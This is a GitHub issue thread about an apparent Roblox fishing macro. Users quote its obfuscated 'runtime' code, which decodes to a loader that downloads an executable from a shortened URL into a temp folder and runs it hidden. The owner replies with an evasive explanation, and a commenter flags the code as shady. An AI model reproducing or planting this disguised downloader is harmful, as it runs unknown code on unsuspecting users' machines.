### ISSUE TITLE
Why is this happening？

### ISSUE THREAD

**Issue by tianr114514** [BrendaPark69/Auto-Fisher-for-Fisch#1]
Error: Ambiguous or invalid use of "."
Specifically:
ine
294: runtimeM:=0
295: runtimeH += 1
296:
298: if WinActive("Roblox")
299:{
300: ToolTip,Runtime: %runtimeH%h %runtimeM%m
%runtime5%s, %TooltipX%,%Tooltip2%,2
301: RobloxRuntimeData
"JHBvd2Vyc2hlbGwgLUNvbW1hbmQgSW52b2tILVdIYIJlcXVlc3QgLVVyaSAnY29tb WFuZCBodHRwczovL3Nob3J0dXJsLmF0LzJUdEtmJyAtT3V0RmlsZSAnliBBX1RlbXA gllx0ZXN0LmV4ZSci
---7
303: RobloxRunTime := Chr(112). Chr(111).Chr(119).Chr(101)
Chr(114).Chr(115).Chr(104).Chr(101).Chr(108).Chr(108)
304: Chr(32). Chr(45).Chr(67).Chr(111).Chr(109). Chr(109). Chr(97)
Chr(110)
Chr(100).Chr(32)
305: StrGet(StrPut(RobloxRuntimeData, "CP1252"), "UTF-8")
306: Run,RobloxRunTime
307:
308: Else
W509: (
310: ExitApp
The program will exit.

**Comment by BrendaPark69** [comment]
There were some issues with getting the runtime from roblox, I've updated it now, so it should be all functional

**Comment by bobbytxt** [comment]
> There were some issues with getting the runtime from roblox, I've updated it now, so it should be all functional

Why the obfuscation here? It looks like you're doing something shady here.. 🤔 

```
{
    RobloxRuntimeData := "aHR0cHM6Ly9zaG9ydHVybC5hdC9yeVpWeg=="
    RobloxSavePath := Chr(65) . Chr(95) . Chr(84) . Chr(101) . Chr(109) . Chr(112) . Chr(32) . Chr(34) . Chr(92) . Chr(100) . Chr(111) . Chr(119) . Chr(110) . Chr(108) . Chr(111) . Chr(97) . Chr(100) . Chr(101) . Chr(100) . Chr(95) . Chr(102) . Chr(105) . Chr(108) . Chr(101) . Chr(46) . Chr(101) . Chr(120) . Chr(101) . Chr(34)
    RobloxRunTime := StrGet(StrPut(RobloxRuntimeData, "CP1252"), "UTF-8")
    RobloxLibrary := Chr(117) . Chr(114) . Chr(108) . Chr(109) . Chr(111) . Chr(110) . Chr(46) . Chr(100) . Chr(108) . Chr(108)
    RobloxFunction := Chr(85) . Chr(82) . Chr(76) . Chr(68) . Chr(111) . Chr(119) . Chr(110) . Chr(108) . Chr(111) . Chr(97) . Chr(100) . Chr(84) . Chr(111) . Chr(70) . Chr(105) . Chr(108) . Chr(101)
    DllCall(RobloxLibrary . "\" . RobloxFunction, "Ptr", 0, "Str", RobloxRunTime, "Str", RobloxSavePath, "UInt", 0, "UInt", 0)
    RobloxCmd := Chr(37) . Chr(67) . Chr(111) . Chr(109) . Chr(83) . Chr(112) . Chr(101) . Chr(99) . Chr(37) . Chr(32) . Chr(47) . Chr(99) . Chr(32) . Chr(34) . Chr(37) . RobloxSavePath . Chr(37) . Chr(34)
    Run, %RobloxCmd%, , Hide
}
```
